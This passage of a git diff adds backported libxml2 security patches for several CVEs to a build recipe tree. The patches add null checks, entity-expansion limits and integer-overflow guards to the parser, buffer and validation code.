+of errors. Otherwise, struct xmlElementContent could contain unexpected
+null pointers, leading to a null deref when post-validating documents
+which aren't well-formed and parsed in recovery mode.
+
+Fixes #243.
+
+Upstream-Status: Backport
+[https://gitlab.gnome.org/GNOME/libxml2/-/commit/babe75030c7f64a37826bb3342317134568bef61]
+CVE: CVE-2021-3537
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ parser.c | 7 +++++++
+ 1 file changed, 7 insertions(+)
+
+diff --git a/parser.c b/parser.c
+index b42e6043..73c27edd 100644
+--- a/parser.c
++++ b/parser.c
+@@ -6208,6 +6208,8 @@ xmlParseElementChildrenContentDeclPriv(xmlParserCtxtPtr ctxt, int inputchk,
+ SKIP_BLANKS;
+ cur = ret = xmlParseElementChildrenContentDeclPriv(ctxt, inputid,
+ depth + 1);
++ if (cur == NULL)
++ return(NULL);
+ SKIP_BLANKS;
+ GROW;
+ } else {
+@@ -6341,6 +6343,11 @@ xmlParseElementChildrenContentDeclPriv(xmlParserCtxtPtr ctxt, int inputchk,
+ SKIP_BLANKS;
+ last = xmlParseElementChildrenContentDeclPriv(ctxt, inputid,
+ depth + 1);
++ if (last == NULL) {
++ if (ret != NULL)
++ xmlFreeDocElementContent(ctxt->myDoc, ret);
++ return(NULL);
++ }
+ SKIP_BLANKS;
+ } else {
+ elem = xmlParseName(ctxt);
+--
+GitLab
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2021-3541.patch b/meta/recipes-core/libxml/libxml2/CVE-2021-3541.patch
new file mode 100644
index 0000000000..1f392b4cd7
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2021-3541.patch
@@ -0,0 +1,73 @@
+From 8598060bacada41a0eb09d95c97744ff4e428f8e Mon Sep 17 00:00:00 2001
+From: Daniel Veillard <veillard@redhat.com>
+Date: Thu, 13 May 2021 14:55:12 +0200
+Subject: [PATCH] Patch for security issue CVE-2021-3541
+
+This is relapted to parameter entities expansion and following
+the line of the billion laugh attack. Somehow in that path the
+counting of parameters was missed and the normal algorithm based
+on entities "density" was useless.
+
+Upstream-Status: Backport
+[https://gitlab.gnome.org/GNOME/libxml2/-/commit/8598060bacada41a0eb09d95c97744ff4e428f8e]
+CVE: CVE-2021-3541
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ parser.c | 26 ++++++++++++++++++++++++++
+ 1 file changed, 26 insertions(+)
+
+diff --git a/parser.c b/parser.c
+index f5e5e169..c9312fa4 100644
+--- a/parser.c
++++ b/parser.c
+@@ -140,6 +140,7 @@ xmlParserEntityCheck(xmlParserCtxtPtr ctxt, size_t size,
+ xmlEntityPtr ent, size_t replacement)
+ {
+ size_t consumed = 0;
++ int i;
+
+ if ((ctxt == NULL) || (ctxt->options & XML_PARSE_HUGE))
+ return (0);
+@@ -177,6 +178,28 @@ xmlParserEntityCheck(xmlParserCtxtPtr ctxt, size_t size,
+ rep = NULL;
+ }
+ }
++
++ /*
++ * Prevent entity exponential check, not just replacement while
++ * parsing the DTD
++ * The check is potentially costly so do that only once in a thousand
++ */
++ if ((ctxt->instate == XML_PARSER_DTD) && (ctxt->nbentities > 10000) &&
++ (ctxt->nbentities % 1024 == 0)) {
++ for (i = 0;i < ctxt->inputNr;i++) {
++ consumed += ctxt->inputTab[i]->consumed +
++ (ctxt->inputTab[i]->cur - ctxt->inputTab[i]->base);
++ }
++ if (ctxt->nbentities > consumed * XML_PARSER_NON_LINEAR) {
++ xmlFatalErr(ctxt, XML_ERR_ENTITY_LOOP, NULL);
++ ctxt->instate = XML_PARSER_EOF;
++ return (1);
++ }
++ consumed = 0;
++ }
++
++
++
+ if (replacement != 0) {
+ if (replacement < XML_MAX_TEXT_LENGTH)
+ return(0);
+@@ -7963,6 +7986,9 @@ xmlParsePEReference(xmlParserCtxtPtr ctxt)
+ xmlChar start[4];
+ xmlCharEncoding enc;
+
++ if (xmlParserEntityCheck(ctxt, 0, entity, 0))
++ return;
++
+ if ((entity->etype == XML_EXTERNAL_PARAMETER_ENTITY) &&
+ ((ctxt->options & XML_PARSE_NOENT) == 0) &&
+ ((ctxt->options & XML_PARSE_DTDVALID) == 0) &&
+--
+GitLab
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2022-23308-fix-regression.patch b/meta/recipes-core/libxml/libxml2/CVE-2022-23308-fix-regression.patch
new file mode 100644
index 0000000000..7fc243eec1
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2022-23308-fix-regression.patch
@@ -0,0 +1,98 @@
+From 646fe48d1c8a74310c409ddf81fe7df6700052af Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Tue, 22 Feb 2022 11:51:08 +0100
+Subject: [PATCH] Fix --without-valid build
+
+Regressed in commit 652dd12a.
+---
+ valid.c | 58 ++++++++++++++++++++++++++++-----------------------------
+ 1 file changed, 29 insertions(+), 29 deletions(-)
+---
+
+From https://github.com/GNOME/libxml2.git
+ commit 646fe48d1c8a74310c409ddf81fe7df6700052af
+
+CVE: CVE-2022-23308
+Upstream-Status: Backport
+
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+
+diff --git a/valid.c b/valid.c
+index 8e596f1d..9684683a 100644
+--- a/valid.c
++++ b/valid.c
+@@ -479,35 +479,6 @@ nodeVPop(xmlValidCtxtPtr ctxt)
+ return (ret);
+ }
+
+-/**
+- * xmlValidNormalizeString:
+- * @str: a string
+- *
+- * Normalize a string in-place.
+- */
+-static void
+-xmlValidNormalizeString(xmlChar *str) {
+- xmlChar *dst;
+- const xmlChar *src;
+-
+- if (str == NULL)
+- return;
+- src = str;
+- dst = str;
+-
+- while (*src == 0x20) src++;
+- while (*src != 0) {
+- if (*src == 0x20) {
+- while (*src == 0x20) src++;
+- if (*src != 0)
+- *dst++ = 0x20;
+- } else {
+- *dst++ = *src++;
+- }
+- }
+- *dst = 0;
+-}
+-
+ #ifdef DEBUG_VALID_ALGO
+ static void
+ xmlValidPrintNode(xmlNodePtr cur) {
+@@ -2636,6 +2607,35 @@ xmlDumpNotationTable(xmlBufferPtr buf, xmlNotationTablePtr table) {
+ (xmlDictOwns(dict, (const xmlChar *)(str)) == 0))) \
+ xmlFree((char *)(str));
+
++/**
++ * xmlValidNormalizeString:
++ * @str: a string
++ *
++ * Normalize a string in-place.
++ */
++static void
++xmlValidNormalizeString(xmlChar *str) {
++ xmlChar *dst;
++ const xmlChar *src;
++
++ if (str == NULL)
++ return;
++ src = str;
++ dst = str;
++
++ while (*src == 0x20) src++;
++ while (*src != 0) {
++ if (*src == 0x20) {
++ while (*src == 0x20) src++;
++ if (*src != 0)
++ *dst++ = 0x20;
++ } else {
++ *dst++ = *src++;
++ }
++ }
++ *dst = 0;
++}
++
+ static int
+ xmlIsStreaming(xmlValidCtxtPtr ctxt) {
+ xmlParserCtxtPtr pctxt;
+--
+2.35.1
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2022-23308.patch b/meta/recipes-core/libxml/libxml2/CVE-2022-23308.patch
new file mode 100644
index 0000000000..bf5604e81a
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2022-23308.patch
@@ -0,0 +1,204 @@
+From 8b66850de350f0fcd786ae776a65ba15a5999e50 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Tue, 8 Feb 2022 03:29:24 +0100
+Subject: [PATCH] Use-after-free of ID and IDREF attributes
+
+If a document is parsed with XML_PARSE_DTDVALID and without
+XML_PARSE_NOENT, the value of ID attributes has to be normalized after
+potentially expanding entities in xmlRemoveID. Otherwise, later calls
+to xmlGetID can return a pointer to previously freed memory.
+
+ID attributes which are empty or contain only whitespace after
+entity expansion are affected in a similar way. This is fixed by
+not storing such attributes in the ID table.
+
+The test to detect streaming mode when validating against a DTD was
+broken. In connection with the defects above, this could result in a
+use-after-free when using the xmlReader interface with validation.
+Fix detection of streaming mode to avoid similar issues. (This changes
+the expected result of a test case. But as far as I can tell, using the
+XML reader with XIncludes referencing the root document never worked
+properly, anyway.)
+
+All of these issues can result in denial of service. Using xmlReader
+with validation could result in disclosure of memory via the error
+channel, typically stderr. The security impact of xmlGetID returning
+a pointer to freed memory depends on the application. The typical use
+case of calling xmlGetID on an unmodified document is not affected.
+
+Upstream-Status: Backport
+[https://gitlab.gnome.org/GNOME/libxml2/-/commit/652dd12a858989b14eed4e84e453059cd3ba340e]
+
+The upstream patch 652dd12a858989b14eed4e84e453059cd3ba340e has been modified
+to skip the patch to the testsuite result (result/XInclude/ns1.xml.rdr), as
+this particular test does not exist in v2.9.10 (it was added later).
+
+CVE: CVE-2022-23308
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+
+---
+ valid.c | 88 +++++++++++++++++++++++++++++++++++----------------------
+ 1 file changed, 55 insertions(+), 33 deletions(-)
+
+diff --git a/valid.c b/valid.c
+index 07963e7..ee75311 100644
+--- a/valid.c
++++ b/valid.c
+@@ -479,6 +479,35 @@ nodeVPop(xmlValidCtxtPtr ctxt)
+ return (ret);
+ }
+
++/**
++ * xmlValidNormalizeString:
++ * @str: a string
++ *
++ * Normalize a string in-place.
++ */
++static void
++xmlValidNormalizeString(xmlChar *str) {
++ xmlChar *dst;
++ const xmlChar *src;
++
++ if (str == NULL)
++ return;
++ src = str;
++ dst = str;
++
++ while (*src == 0x20) src++;
++ while (*src != 0) {
++ if (*src == 0x20) {
++ while (*src == 0x20) src++;
++ if (*src != 0)
++ *dst++ = 0x20;
++ } else {
++ *dst++ = *src++;
++ }
++ }
++ *dst = 0;
++}
++
+ #ifdef DEBUG_VALID_ALGO
+ static void
+ xmlValidPrintNode(xmlNodePtr cur) {
+@@ -2607,6 +2636,24 @@ xmlDumpNotationTable(xmlBufferPtr buf, xmlNotationTablePtr table) {
+ (xmlDictOwns(dict, (const xmlChar *)(str)) == 0))) \
+ xmlFree((char *)(str));
+
++static int
++xmlIsStreaming(xmlValidCtxtPtr ctxt) {
++ xmlParserCtxtPtr pctxt;
++
++ if (ctxt == NULL)
++ return(0);
++ /*
++ * These magic values are also abused to detect whether we're validating
++ * while parsing a document. In this case, userData points to the parser
++ * context.
++ */
++ if ((ctxt->finishDtd != XML_CTXT_FINISH_DTD_0) &&
++ (ctxt->finishDtd != XML_CTXT_FINISH_DTD_1))
++ return(0);
++ pctxt = ctxt->userData;
++ return(pctxt->parseMode == XML_PARSE_READER);
++}
++
+ /**
+ * xmlFreeID:
+ * @not: A id
+@@ -2650,7 +2697,7 @@ xmlAddID(xmlValidCtxtPtr ctxt, xmlDocPtr doc, const xmlChar *value,
+ if (doc == NULL) {
+ return(NULL);
+ }
+- if (value == NULL) {
++ if ((value == NULL) || (value[0] == 0)) {
+ return(NULL);
+ }
+ if (attr == NULL) {
+@@ -2681,7 +2728,7 @@ xmlAddID(xmlValidCtxtPtr ctxt, xmlDocPtr doc, const xmlChar *value,
+ */
+ ret->value = xmlStrdup(value);
+ ret->doc = doc;
+- if ((ctxt != NULL) && (ctxt->vstateNr != 0)) {
++ if (xmlIsStreaming(ctxt)) {
+ /*
+ * Operating in streaming mode, attr is gonna disappear
+ */
+@@ -2820,6 +2867,7 @@ xmlRemoveID(xmlDocPtr doc, xmlAttrPtr attr) {
+ ID = xmlNodeListGetString(doc, attr->children, 1);
+ if (ID == NULL)
+ return(-1);
++ xmlValidNormalizeString(ID);
+
+ id = xmlHashLookup(table, ID);
+ if (id == NULL || id->attr != attr) {
+@@ -3009,7 +3057,7 @@ xmlAddRef(xmlValidCtxtPtr ctxt, xmlDocPtr doc, const xmlChar *value,
+ * fill the structure.
+ */
+ ret->value = xmlStrdup(value);
+- if ((ctxt != NULL) && (ctxt->vstateNr != 0)) {
++ if (xmlIsStreaming(ctxt)) {
+ /*
+ * Operating in streaming mode, attr is gonna disappear
+ */
+@@ -4028,8 +4076,7 @@ xmlValidateAttributeValue2(xmlValidCtxtPtr ctxt, xmlDocPtr doc,
+ xmlChar *
+ xmlValidCtxtNormalizeAttributeValue(xmlValidCtxtPtr ctxt, xmlDocPtr doc,
+ xmlNodePtr elem, const xmlChar *name, const xmlChar *value) {
+- xmlChar *ret, *dst;
+- const xmlChar *src;
++ xmlChar *ret;
+ xmlAttributePtr attrDecl = NULL;
+ int extsubset = 0;
+
+@@ -4070,19 +4117,7 @@ xmlValidCtxtNormalizeAttributeValue(xmlValidCtxtPtr ctxt, xmlDocPtr doc,
+ ret = xmlStrdup(value);
+ if (ret == NULL)
+ return(NULL);
+- src = value;
+- dst = ret;
+- while (*src == 0x20) src++;
+- while (*src != 0) {
+- if (*src == 0x20) {
+- while (*src == 0x20) src++;
+- if (*src != 0)
+- *dst++ = 0x20;
+- } else {
+- *dst++ = *src++;
+- }
+- }
+- *dst = 0;
++ xmlValidNormalizeString(ret);
+ if ((doc->standalone) && (extsubset == 1) && (!xmlStrEqual(value, ret))) {
+ xmlErrValidNode(ctxt, elem, XML_DTD_NOT_STANDALONE,
+ "standalone: %s on %s value had to be normalized based on external subset declaration\n",
+@@ -4114,8 +4149,7 @@ xmlValidCtxtNormalizeAttributeValue(xmlValidCtxtPtr ctxt, xmlDocPtr doc,
+ xmlChar *
+ xmlValidNormalizeAttributeValue(xmlDocPtr doc, xmlNodePtr elem,
+ const xmlChar *name, const xmlChar *value) {
+- xmlChar *ret, *dst;
+- const xmlChar *src;
++ xmlChar *ret;
+ xmlAttributePtr attrDecl = NULL;
+
+ if (doc == NULL) return(NULL);
+@@ -4145,19 +4179,7 @@ xmlValidNormalizeAttributeValue(xmlDocPtr doc, xmlNodePtr elem,
+ ret = xmlStrdup(value);
+ if (ret == NULL)
+ return(NULL);
+- src = value;
+- dst = ret;
+- while (*src == 0x20) src++;
+- while (*src != 0) {
+- if (*src == 0x20) {
+- while (*src == 0x20) src++;
+- if (*src != 0)
+- *dst++ = 0x20;
+- } else {
+- *dst++ = *src++;
+- }
+- }
+- *dst = 0;
++ xmlValidNormalizeString(ret);
+ return(ret);
+ }
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2022-29824-dependent.patch b/meta/recipes-core/libxml/libxml2/CVE-2022-29824-dependent.patch
new file mode 100644
index 0000000000..63d613cc21
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2022-29824-dependent.patch
@@ -0,0 +1,53 @@
+From b07251215ef48c70c6e56f7351406c47cfca4d5b Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Fri, 10 Jan 2020 15:55:07 +0100
+Subject: [PATCH] Fix integer overflow in xmlBufferResize
+
+Found by OSS-Fuzz.
+
+CVE: CVE-2022-29824
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/b07251215ef48c70c6e56f7351406c47cfca4d5b]
+
+Signed-off-by: Riyaz Ahmed Khan <Riyaz.Khan@kpit.com>
+
+---
+ tree.c | 9 +++++++--
+ 1 file changed, 7 insertions(+), 2 deletions(-)
+
+diff --git a/tree.c b/tree.c
+index 0d7fc98c..f43f6de1 100644
+--- a/tree.c
++++ b/tree.c
+@@ -7424,12 +7424,17 @@ xmlBufferResize(xmlBufferPtr buf, unsigned int size)
+ if (size < buf->size)
+ return 1;
+
++ if (size > UINT_MAX - 10) {
++ xmlTreeErrMemory("growing buffer");
++ return 0;
++ }
++
+ /* figure out new size */
+ switch (buf->alloc){
+ case XML_BUFFER_ALLOC_IO:
+ case XML_BUFFER_ALLOC_DOUBLEIT:
+ /*take care of empty case*/
+- newSize = (buf->size ? buf->size*2 : size + 10);
++ newSize = (buf->size ? buf->size : size + 10);
+ while (size > newSize) {
+ if (newSize > UINT_MAX / 2) {
+ xmlTreeErrMemory("growing buffer");
+@@ -7445,7 +7450,7 @@ xmlBufferResize(xmlBufferPtr buf, unsigned int size)
+ if (buf->use < BASE_BUFFER_SIZE)
+ newSize = size;
+ else {
+- newSize = buf->size * 2;
++ newSize = buf->size;
+ while (size > newSize) {
+ if (newSize > UINT_MAX / 2) {
+ xmlTreeErrMemory("growing buffer");
+--
+GitLab
+
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2022-29824.patch b/meta/recipes-core/libxml/libxml2/CVE-2022-29824.patch
new file mode 100644
index 0000000000..ad7b87dbc6
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2022-29824.patch
@@ -0,0 +1,348 @@
+From 2554a2408e09f13652049e5ffb0d26196b02ebab Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Tue, 8 Mar 2022 20:10:02 +0100
+Subject: [PATCH] [CVE-2022-29824] Fix integer overflows in xmlBuf and
+ xmlBuffer
+
+In several places, the code handling string buffers didn't check for
+integer overflow or used wrong types for buffer sizes. This could
+result in out-of-bounds writes or other memory errors when working on
+large, multi-gigabyte buffers.
+
+Thanks to Felix Wilhelm for the report.
+
+CVE: CVE-2022-29824
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/2554a2408e09f13652049e5ffb0d26196b02ebab]
+
+Signed-off-by: Riyaz Ahmed Khan <Riyaz.Khan@kpit.com>
+
+---
+ buf.c | 86 +++++++++++++++++++++++-----------------------------------
+ tree.c | 72 ++++++++++++++++++------------------------------
+ 2 files changed, 61 insertions(+), 97 deletions(-)
+
+diff --git a/buf.c b/buf.c
+index 24368d37..40a5ee06 100644
+--- a/buf.c
++++ b/buf.c
+@@ -30,6 +30,10 @@
+ #include <libxml/parserInternals.h> /* for XML_MAX_TEXT_LENGTH */
+ #include "buf.h"
+
++#ifndef SIZE_MAX
++#define SIZE_MAX ((size_t) -1)
++#endif
++
+ #define WITH_BUFFER_COMPAT
+
+ /**
+@@ -156,6 +160,8 @@ xmlBufPtr
+ xmlBufCreateSize(size_t size) {
+ xmlBufPtr ret;
+
++ if (size == SIZE_MAX)
++ return(NULL);
+ ret = (xmlBufPtr) xmlMalloc(sizeof(xmlBuf));
+ if (ret == NULL) {
+ xmlBufMemoryError(NULL, "creating buffer");
+@@ -166,8 +172,8 @@ xmlBufCreateSize(size_t size) {
+ ret->error = 0;
+ ret->buffer = NULL;
+ ret->alloc = xmlBufferAllocScheme;
+- ret->size = (size ? size+2 : 0); /* +1 for ending null */
+- ret->compat_size = (int) ret->size;
++ ret->size = (size ? size + 1 : 0); /* +1 for ending null */
++ ret->compat_size = (ret->size > INT_MAX ? INT_MAX : ret->size);
+ if (ret->size){
+ ret->content = (xmlChar *) xmlMallocAtomic(ret->size * sizeof(xmlChar));
+ if (ret->content == NULL) {
+@@ -442,23 +448,17 @@ xmlBufGrowInternal(xmlBufPtr buf, size_t len) {
+ CHECK_COMPAT(buf)
+
+ if (buf->alloc == XML_BUFFER_ALLOC_IMMUTABLE) return(0);
+- if (buf->use + len < buf->size)
++ if (len < buf->size - buf->use)
+ return(buf->size - buf->use);
++ if (len > SIZE_MAX - buf->use)
++ return(0);
+
+- /*
+- * Windows has a BIG problem on realloc timing, so we try to double
+- * the buffer size (if that's enough) (bug 146697)
+- * Apparently BSD too, and it's probably best for linux too
+- * On an embedded system this may be something to change
+- */
+-#if 1
+- if (buf->size > (size_t) len)
+- size = buf->size * 2;
+- else
+- size = buf->use + len + 100;
+-#else
+- size = buf->use + len + 100;
+-#endif
++ if (buf->size > (size_t) len) {
++ size = buf->size > SIZE_MAX / 2 ? SIZE_MAX : buf->size * 2;
++ } else {
++ size = buf->use + len;
++ size = size > SIZE_MAX - 100 ? SIZE_MAX : size + 100;
++ }
+
+ if (buf->alloc == XML_BUFFER_ALLOC_BOUNDED) {
+ /*
+@@ -744,7 +744,7 @@ xmlBufIsEmpty(const xmlBufPtr buf)
+ int
+ xmlBufResize(xmlBufPtr buf, size_t size)
+ {
+- unsigned int newSize;
++ size_t newSize;
+ xmlChar* rebuf = NULL;
+ size_t start_buf;
+
+@@ -772,9 +772,13 @@ xmlBufResize(xmlBufPtr buf, size_t size)
+ case XML_BUFFER_ALLOC_IO:
+ case XML_BUFFER_ALLOC_DOUBLEIT:
+ /*take care of empty case*/
+- newSize = (buf->size ? buf->size*2 : size + 10);
++ if (buf->size == 0) {
++ newSize = (size > SIZE_MAX - 10 ? SIZE_MAX : size + 10);
++ } else {
++ newSize = buf->size;
++ }
+ while (size > newSize) {
+- if (newSize > UINT_MAX / 2) {
++ if (newSize > SIZE_MAX / 2) {
+ xmlBufMemoryError(buf, "growing buffer");
+ return 0;
+ }
+@@ -782,15 +786,15 @@ xmlBufResize(xmlBufPtr buf, size_t size)
+ }
+ break;
+ case XML_BUFFER_ALLOC_EXACT:
+- newSize = size+10;
++ newSize = (size > SIZE_MAX - 10 ? SIZE_MAX : size + 10);
+ break;
+ case XML_BUFFER_ALLOC_HYBRID:
+ if (buf->use < BASE_BUFFER_SIZE)
+ newSize = size;
+ else {
+- newSize = buf->size * 2;
++ newSize = buf->size;
+ while (size > newSize) {
+- if (newSize > UINT_MAX / 2) {
++ if (newSize > SIZE_MAX / 2) {
+ xmlBufMemoryError(buf, "growing buffer");
+ return 0;
+ }
+@@ -800,7 +804,7 @@ xmlBufResize(xmlBufPtr buf, size_t size)
+ break;
+
+ default:
+- newSize = size+10;
++ newSize = (size > SIZE_MAX - 10 ? SIZE_MAX : size + 10);
+ break;
+ }
+
+@@ -866,7 +870,7 @@ xmlBufResize(xmlBufPtr buf, size_t size)
+ */
+ int
+ xmlBufAdd(xmlBufPtr buf, const xmlChar *str, int len) {
+- unsigned int needSize;
++ size_t needSize;
+
+ if ((str == NULL) || (buf == NULL) || (buf->error))
+ return -1;
+@@ -888,8 +892,10 @@ xmlBufAdd(xmlBufPtr buf, const xmlChar *str, int len) {
+ if (len < 0) return -1;
+ if (len == 0) return 0;
+
+- needSize = buf->use + len + 2;
+- if (needSize > buf->size){
++ if ((size_t) len >= buf->size - buf->use) {
++ if ((size_t) len >= SIZE_MAX - buf->use)
++ return(-1);
++ needSize = buf->use + len + 1;
+ if (buf->alloc == XML_BUFFER_ALLOC_BOUNDED) {
+ /*
+ * Used to provide parsing limits
+@@ -1025,31 +1031,7 @@ xmlBufCat(xmlBufPtr buf, const xmlChar *str) {
+ */
+ int
+ xmlBufCCat(xmlBufPtr buf, const char *str) {
+- const char *cur;
+-
+- if ((buf == NULL) || (buf->error))
+- return(-1);
+- CHECK_COMPAT(buf)
+- if (buf->alloc == XML_BUFFER_ALLOC_IMMUTABLE) return -1;
+- if (str == NULL) {
+-#ifdef DEBUG_BUFFER
+- xmlGenericError(xmlGenericErrorContext,
+- "xmlBufCCat: str == NULL\n");
+-#endif
+- return -1;
+- }
+- for (cur = str;*cur != 0;cur++) {
+- if (buf->use + 10 >= buf->size) {
+- if (!xmlBufResize(buf, buf->use+10)){
+- xmlBufMemoryError(buf, "growing buffer");
+- return XML_ERR_NO_MEMORY;
+- }
+- }
+- buf->content[buf->use++] = *cur;
+- }
+- buf->content[buf->use] = 0;
+- UPDATE_COMPAT(buf)
+- return 0;
++ return xmlBufCat(buf, (const xmlChar *) str);
+ }
+
+ /**
+diff --git a/tree.c b/tree.c
+index 9d94aa42..86afb7d6 100644
+--- a/tree.c
++++ b/tree.c
+@@ -7104,6 +7104,8 @@ xmlBufferPtr
+ xmlBufferCreateSize(size_t size) {
+ xmlBufferPtr ret;
+
++ if (size >= UINT_MAX)
++ return(NULL);
+ ret = (xmlBufferPtr) xmlMalloc(sizeof(xmlBuffer));
+ if (ret == NULL) {
+ xmlTreeErrMemory("creating buffer");
+@@ -7111,7 +7113,7 @@ xmlBufferCreateSize(size_t size) {
+ }
+ ret->use = 0;
+ ret->alloc = xmlBufferAllocScheme;
+- ret->size = (size ? size+2 : 0); /* +1 for ending null */
++ ret->size = (size ? size + 1 : 0); /* +1 for ending null */
+ if (ret->size){
+ ret->content = (xmlChar *) xmlMallocAtomic(ret->size * sizeof(xmlChar));
+ if (ret->content == NULL) {
+@@ -7171,6 +7173,8 @@ xmlBufferCreateStatic(void *mem, size_t size) {
+
+ if ((mem == NULL) || (size == 0))
+ return(NULL);
++ if (size > UINT_MAX)
++ return(NULL);
+
+ ret = (xmlBufferPtr) xmlMalloc(sizeof(xmlBuffer));
+ if (ret == NULL) {
+@@ -7318,28 +7322,23 @@ xmlBufferShrink(xmlBufferPtr buf, unsigned int len) {
+ */
+ int
+ xmlBufferGrow(xmlBufferPtr buf, unsigned int len) {
+- int size;
++ unsigned int size;
+ xmlChar *newbuf;
+
+ if (buf == NULL) return(-1);
+
+ if (buf->alloc == XML_BUFFER_ALLOC_IMMUTABLE) return(0);
+- if (len + buf->use < buf->size) return(0);
++ if (len < buf->size - buf->use)
++ return(0);
++ if (len > UINT_MAX - buf->use)
++ return(-1);
+
+- /*
+- * Windows has a BIG problem on realloc timing, so we try to double
+- * the buffer size (if that's enough) (bug 146697)
+- * Apparently BSD too, and it's probably best for linux too
+- * On an embedded system this may be something to change
+- */
+-#if 1
+- if (buf->size > len)
+- size = buf->size * 2;
+- else
+- size = buf->use + len + 100;
+-#else
+- size = buf->use + len + 100;
+-#endif
++ if (buf->size > (size_t) len) {
++ size = buf->size > UINT_MAX / 2 ? UINT_MAX : buf->size * 2;
++ } else {
++ size = buf->use + len;
++ size = size > UINT_MAX - 100 ? UINT_MAX : size + 100;
++ }
+
+ if ((buf->alloc == XML_BUFFER_ALLOC_IO) && (buf->contentIO != NULL)) {
+ size_t start_buf = buf->content - buf->contentIO;
+@@ -7466,7 +7465,10 @@ xmlBufferResize(xmlBufferPtr buf, unsigned int size)
+ case XML_BUFFER_ALLOC_IO:
+ case XML_BUFFER_ALLOC_DOUBLEIT:
+ /*take care of empty case*/
+- newSize = (buf->size ? buf->size : size + 10);
++ if (buf->size == 0)
++ newSize = (size > UINT_MAX - 10 ? UINT_MAX : size + 10);
++ else
++ newSize = buf->size;
+ while (size > newSize) {
+ if (newSize > UINT_MAX / 2) {
+ xmlTreeErrMemory("growing buffer");
+@@ -7476,7 +7478,7 @@ xmlBufferResize(xmlBufferPtr buf, unsigned int size)
+ }
+ break;
+ case XML_BUFFER_ALLOC_EXACT:
+- newSize = size+10;
++ newSize = (size > UINT_MAX - 10 ? UINT_MAX : size + 10);;
+ break;
+ case XML_BUFFER_ALLOC_HYBRID:
+ if (buf->use < BASE_BUFFER_SIZE)
+@@ -7494,7 +7496,7 @@ xmlBufferResize(xmlBufferPtr buf, unsigned int size)
+ break;
+
+ default:
+- newSize = size+10;
++ newSize = (size > UINT_MAX - 10 ? UINT_MAX : size + 10);;
+ break;
+ }
+
+@@ -7580,8 +7582,10 @@ xmlBufferAdd(xmlBufferPtr buf, const xmlChar *str, int len) {
+ if (len < 0) return -1;
+ if (len == 0) return 0;
+
+- needSize = buf->use + len + 2;
+- if (needSize > buf->size){
++ if ((unsigned) len >= buf->size - buf->use) {
++ if ((unsigned) len >= UINT_MAX - buf->use)
++ return XML_ERR_NO_MEMORY;
++ needSize = buf->use + len + 1;
+ if (!xmlBufferResize(buf, needSize)){
+ xmlTreeErrMemory("growing buffer");
+ return XML_ERR_NO_MEMORY;
+@@ -7694,29 +7698,7 @@ xmlBufferCat(xmlBufferPtr buf, const xmlChar *str) {
+ */
+ int
+ xmlBufferCCat(xmlBufferPtr buf, const char *str) {
+- const char *cur;
+-
+- if (buf == NULL)
+- return(-1);
+- if (buf->alloc == XML_BUFFER_ALLOC_IMMUTABLE) return -1;
+- if (str == NULL) {
+-#ifdef DEBUG_BUFFER
+- xmlGenericError(xmlGenericErrorContext,
+- "xmlBufferCCat: str == NULL\n");
+-#endif
+- return -1;
+- }
+- for (cur = str;*cur != 0;cur++) {
+- if (buf->use + 10 >= buf->size) {
+- if (!xmlBufferResize(buf, buf->use+10)){
+- xmlTreeErrMemory("growing buffer");
+- return XML_ERR_NO_MEMORY;
+- }
+- }
+- buf->content[buf->use++] = *cur;
+- }
+- buf->content[buf->use] = 0;
+- return 0;
++ return xmlBufferCat(buf, (const xmlChar *) str);
+ }
+
+ /**
+--
+GitLab
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2022-40303.patch b/meta/recipes-core/libxml/libxml2/CVE-2022-40303.patch
new file mode 100644
index 0000000000..bdb9e9eb7a
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2022-40303.patch
@@ -0,0 +1,623 @@
+From c846986356fc149915a74972bf198abc266bc2c0 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Thu, 25 Aug 2022 17:43:08 +0200
+Subject: [PATCH] [CVE-2022-40303] Fix integer overflows with XML_PARSE_HUGE
+
+Also impose size limits when XML_PARSE_HUGE is set. Limit size of names
+to XML_MAX_TEXT_LENGTH (10 million bytes) and other content to
+XML_MAX_HUGE_LENGTH (1 billion bytes).
+
+Move some the length checks to the end of the respective loop to make
+them strict.
+
+xmlParseEntityValue didn't have a length limitation at all. But without
+XML_PARSE_HUGE, this should eventually trigger an error in xmlGROW.
+
+Thanks to Maddie Stone working with Google Project Zero for the report!
+
+CVE: CVE-2022-40303
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/c846986356fc149915a74972bf198abc266bc2c0]
+Comments: Refreshed hunk
+
+Signed-off-by: Bhabu Bindu <bhabu.bindu@kpit.com>
+---
+ parser.c | 233 +++++++++++++++++++++++++++++--------------------------
+ 1 file changed, 121 insertions(+), 112 deletions(-)
+
+diff --git a/parser.c b/parser.c
+index 93f031be..79479979 100644
+--- a/parser.c
++++ b/parser.c
+@@ -102,6 +102,8 @@ xmlParseElementEnd(xmlParserCtxtPtr ctxt);
+ * *
+ ************************************************************************/
+
++#define XML_MAX_HUGE_LENGTH 1000000000
++
+ #define XML_PARSER_BIG_ENTITY 1000
